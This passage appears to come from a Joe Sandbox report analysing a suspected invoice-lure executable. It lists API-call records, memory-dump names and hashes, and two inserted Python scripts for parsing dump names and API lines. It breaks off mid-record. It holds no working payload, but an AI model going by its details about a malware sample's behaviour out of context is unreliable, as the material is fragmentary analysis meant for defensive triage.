• Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
• Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
• Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
Uniqueness
Uniqueness Score: -1.00%
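
As an added example (not code from Joe Sandbox or its IDA plugin), a small Python decoder for the .sdmp file names listed in the entry above. The dot-separated field order (process index, stage, unique id, base address, protection, state, region type, dump index) is an assumption read off the names on this page; the protection and region-type values are decoded with the standard Windows PAGE_* and MEM_* constants from winnt.h. Run over the ten names above it singles out the 0x401000 dump as the only executable, image-backed region, which is the one the disassembly in these entries comes from.

```python
"""Decode Joe Sandbox memory-dump (.sdmp) file names into their fields.

Added example; not code from Joe Sandbox or its IDA plugin.  The field
layout is an assumption read off the dump names on this report page; the
protection and region-type values are decoded with the standard Windows
PAGE_* and MEM_* constants from winnt.h.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional

# Windows page-protection values (winnt.h).  The low byte carries one of these.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80
PAGE_GUARD = 0x100

# Windows region types (MEMORY_BASIC_INFORMATION.Type).
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

# Assumed layout (hypothetical, inferred from this page):
# <process index>.<stage>.<unique id>.<base>.<protection>.<state>.<type>.<dump index>.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>\d{8})\.(?P<stage>\d{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\."
    r"(?P<state>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\."
    r"(?P<index>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class SdmpName:
    process_index: int
    stage: int
    base: int
    protect: int
    region_type: int
    dump_index: int

    @property
    def protection_name(self) -> str:
        """Symbolic protection, e.g. PAGE_EXECUTE_READ, with PAGE_GUARD noted."""
        name = PAGE_PROTECTION.get(self.protect & 0xFF, f"UNKNOWN(0x{self.protect:x})")
        if self.protect & PAGE_GUARD:
            name += "|PAGE_GUARD"
        return name

    @property
    def executable(self) -> bool:
        """True for any PAGE_EXECUTE* protection."""
        return bool(self.protect & EXECUTABLE_MASK)

    @property
    def region_type_name(self) -> str:
        return MEM_TYPE.get(self.region_type, f"UNKNOWN(0x{self.region_type:x})")

    @property
    def image_backed(self) -> bool:
        """MEM_IMAGE: pages mapped from a PE on disk (matches 'based on PE: true')."""
        return self.region_type == 0x1000000


def parse_sdmp_name(name: str) -> Optional[SdmpName]:
    """Parse one .sdmp file name; return None if it does not fit the assumed layout."""
    m = SDMP_RE.match(name.strip())
    if m is None:
        return None
    return SdmpName(
        process_index=int(m["proc"]),  # assumed decimal; identical for the small values here
        stage=int(m["stage"]),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        region_type=int(m["type"], 16),
        dump_index=int(m["index"], 16),
    )


def executable_dumps(names: Iterable[str]) -> List[SdmpName]:
    """Dumps whose pages were executable, lowest base first; unparseable names are skipped."""
    parsed = (parse_sdmp_name(n) for n in names)
    return sorted((p for p in parsed if p is not None and p.executable), key=lambda p: p.base)


# Constructed input: the ten dump names listed in the entry above.
SAMPLE_NAMES = [
    "00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp",
    "00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp",
]

if __name__ == "__main__":
    for n in SAMPLE_NAMES:
        d = parse_sdmp_name(n)
        print(f"{d.base:#010x} {d.protection_name:<22} {d.region_type_name} proc={d.process_index}")
    print("executable:", [f"{d.base:#x}" for d in executable_dumps(SAMPLE_NAMES)])
```

The protection byte is the useful pivot: when triaging a report like this one, the executable image-backed dump is the one to load for disassembly, while PAGE_READWRITE dumps at 0x40A000 and above hold the data sections where decrypted configuration or strings tend to land.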

Memory Dump Source
• Same source file, associated dumps and IDA plugin snapshot file as the entry above.
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
• Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
• Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
• Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Same source file, associated dumps and IDA plugin snapshot file as the entry above.
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
• Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
• Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
• Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Same source file, associated dumps and IDA plugin snapshot file as the entry above.
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
• Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
• Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
• Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 004032F2
  • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
• SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 00403325
• SetFilePointer.KERNELBASE(00005FA8,00000000,00000000,00414ED0,00004000,?,00000000,00403208,00000004,00000000,00000000,?,?,00403182,000000FF,00000000), ref: 00403420
Memory Dump Source
• Same source file, associated dumps and IDA plugin snapshot file as the entry above.
Similarity
• API ID: FilePointer$CountTick
• String ID:
• API String ID: 1092082344-0
• Opcode ID: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
• Instruction ID: a2c2ae871b20a7f651e14226ae934804f023725c52e887911cb1b1382089a511
• Opcode Fuzzy Hash: 46bf3b49fb3124b20b26849d3f96ebab8958347a080c85236d637af58840fa95
• Instruction Fuzzy Hash: 54313872610215DBD721DF29EEC496A3BA9F74039A754433FE900F62E0CBB99D018B9D
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
• Instruction ID: f938e70baf20f89fc7421c1cbc4d65c8cbb1a4a40291e2e844035b0cdbff1196
• Opcode Fuzzy Hash: 09b1e881bc629fe9623964bcd0dac9c3534a319fde10b4dd95dd132c0a2dd849
• Instruction Fuzzy Hash: 53314B30200219BBDB109F95ED84ADA3E68EB04759F20857EF905E62D0D6789A509BA9
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
• RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000000,00000011,00000002), ref: 00402557
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CloseQueryValue
• String ID:
• API String ID: 3356406503-0
• Opcode ID: b0b49ade87f7b09473d7e2f987bdaf7adf2fb975b98445e66798791cf69e1e10
• Instruction ID: 8b4d26b48c61f4aea5aea8b01f6eaa690eaa4425e6198d6413393360261ed691
• Opcode Fuzzy Hash: b0b49ade87f7b09473d7e2f987bdaf7adf2fb975b98445e66798791cf69e1e10
• Instruction Fuzzy Hash: 61119431910205EBDB14DF64CA585AE7BB4EF44348F20843FE445B72D0D6B85A81EB5A
Uniqueness
Uniqueness Score: -1.00%

APIs
• MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
• SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
• Instruction ID: 4945fb4554c9d48a14a82d28c5fc4c127f2c3d85d8aa5c2a63fae023cf5e702c
• Opcode Fuzzy Hash: 23ed1533968369fb0e08a97211bc38e5ec6adcca8744e4a1682e6817b2d67833
• Instruction Fuzzy Hash: AB01F431724210EBEB199B789D04B2A3698E710714F104A7FF855F62F1DA78CC529B5D
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0
• RegCloseKey.ADVAPI32(00000000), ref: 004023B9
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
Similarity
• API ID: CloseDeleteValue
• String ID:
• API String ID: 2831762973-0
• Opcode ID: b705e755398730bcef2c4b74d43a9d26e90b86eebd6756a4a086da2d90cf2b5a
• Instruction ID: 92c71ce55c792e737e0c56b3c5c8c262173643586798c2a655fc457b9e75749a
• Opcode Fuzzy Hash: b705e755398730bcef2c4b74d43a9d26e90b86eebd6756a4a086da2d90cf2b5a
• Instruction Fuzzy Hash: 5FF0F632E041109BE700BBA49B8EABE72A49B44314F29003FFE42F31C0CAF85D42976D
Uniqueness
Uniqueness Score: -1.00%
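The API reference lines in these function-analysis records all follow one layout: function name, module, argument list, and the call-site address after "ref:". The following is an added example, not Joe Sandbox code, that parses lines in that layout into structured records so the calls from many records can be grouped by module, filtered by name (for instance the registry calls) and searched for recovered string arguments such as the temp-file path above. The sample lines are copied from the records on this page; the argument typing (eight hex digits read as a 32-bit value, "?" as a value the sandbox did not recover, anything else as a literal string) is an assumption drawn from the visible lines, not documented Joe Sandbox semantics.

```python
"""Parse the 'APIs' lines of Joe Sandbox function-analysis records.

Added example, not Joe Sandbox code. Assumes the layout seen on this page:
    Func.MODULE(arg,arg,...), ref: <8 hex digits>
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple, Union

# Assumed argument typing: 32-bit constant, literal string, or None for '?'
ArgValue = Union[int, str, None]


@dataclass(frozen=True)
class ApiCall:
    func: str                   # e.g. "RegQueryValueExW"
    module: str                 # e.g. "KERNELBASE"
    args: Tuple[ArgValue, ...]  # parsed argument list, in call order
    ref: int                    # call-site address, e.g. 0x4024B5


# Optional leading bullet, then Func.MODULE(args), ref: address
_LINE_RE = re.compile(
    r"^\s*•?\s*(?P<func>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
_HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

# Constructed sample: the API lines copied from the records on this page.
SAMPLE_API_LINES = [
    "SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB",
    "RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5",
    r"RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskD796.tmp,00000000,00000011,00000002), ref: 00402557",
    "MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4",
    "SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4",
    "RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023B0",
    "RegCloseKey.ADVAPI32(00000000), ref: 004023B9",
    "ShowWindow.USER32(00000000,00000000), ref: 00401E67",
    "EnableWindow.USER32(00000000,00000000), ref: 00401E72",
]


def _parse_arg(raw: str) -> ArgValue:
    raw = raw.strip()
    if raw == "?":
        return None            # value not recovered by the sandbox (assumed meaning)
    if _HEX8_RE.match(raw):
        return int(raw, 16)    # 32-bit constant or pointer printed as 8 hex digits
    return raw                 # anything else is taken as a literal string, e.g. a path


def parse_api_line(line: str) -> ApiCall:
    """Parse one 'Func.MODULE(args), ref: addr' line; raises ValueError otherwise."""
    m = _LINE_RE.match(line)
    if m is None:
        raise ValueError(f"not an API reference line: {line!r}")
    args_text = m.group("args")
    # Naive comma split: a string argument containing a comma would be split too.
    args = tuple(_parse_arg(a) for a in args_text.split(",")) if args_text else ()
    return ApiCall(m.group("func"), m.group("module"), args, int(m.group("ref"), 16))


def parse_all(lines) -> List[ApiCall]:
    return [parse_api_line(ln) for ln in lines if ln.strip()]


def calls_by_module(calls) -> Dict[str, Set[str]]:
    """Functions grouped by the module they resolve to (an import-style overview)."""
    out: Dict[str, Set[str]] = defaultdict(set)
    for c in calls:
        out[c.module].add(c.func)
    return dict(out)


def string_args(calls) -> List[str]:
    """Literal string arguments (paths, value names) the sandbox recovered."""
    return [a for c in calls for a in c.args if isinstance(a, str)]


def calls_with_prefix(calls, prefix: str) -> List[ApiCall]:
    """Select calls by function-name prefix, e.g. 'Reg' for the registry API."""
    return [c for c in calls if c.func.startswith(prefix)]


if __name__ == "__main__":
    parsed = parse_all(SAMPLE_API_LINES)
    for mod, funcs in sorted(calls_by_module(parsed).items()):
        print(f"{mod}: {', '.join(sorted(funcs))}")
    for call in calls_with_prefix(parsed, "Reg"):
        print(f"{call.ref:08X} {call.func}{call.args}")
    print("recovered strings:", string_args(parsed))
```

The split on commas is deliberate for these records, where the only string argument is a path without commas; a report whose string arguments can contain commas needs a tokenizer that tracks the opening quote or path start instead. The ref address is kept as an integer so it can be compared directly against the section base given in the Memory Dump Source line (Offset: 00400000) when mapping a call back into the dumped image.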

APIs
• ShowWindow.USER32(00000000,00000000), ref: 00401E67
• EnableWindow.USER32(00000000,00000000), ref: 00401E72
Memory Dump Source
• Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$EnableShow
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1136574915-0
                                                                                                                                                                                                                      • Opcode ID: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                                                                                                                      • Instruction ID: b41365517dadb09c69eaf87789fd34eb77fb4a5ff64ddc4fb458d6156a5e0ce1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 93e3322236d135cf3becb144ab33be47f3bb68365a0b30391c7db73d0d040f31
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DFE0DF32E08200CFE724EFA5AA494AD77B4EB80324B20847FF201F11D1CE7858818F6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                                                                                                                        • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                                                                                                                        • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                                                                                                                        • Part of subcall function 00406752: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067B8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2547128583-0
                                                                                                                                                                                                                      • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                                      • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\18001787_down_payment_invoice_90002104.exe,80000000,00000003), ref: 00405EE2
                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$AttributesCreate
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 415043291-0
                                                                                                                                                                                                                      • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                                      • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00405ABE,?,?,00000000,00405C94,?,?,?,?), ref: 00405EBE
                                                                                                                                                                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000003.00000002.40187512538.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187444186.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187585174.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000430000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187637379.000000000044C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000003.00000002.40187975140.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_18001787_down_payment_invoice_90002104.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                      • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                                                                                      • Instruction ID: 9f0be338fa0adf84d9e7c2e76c5bc37ea56a51acd28ddc8ab22a7b028afbcef4
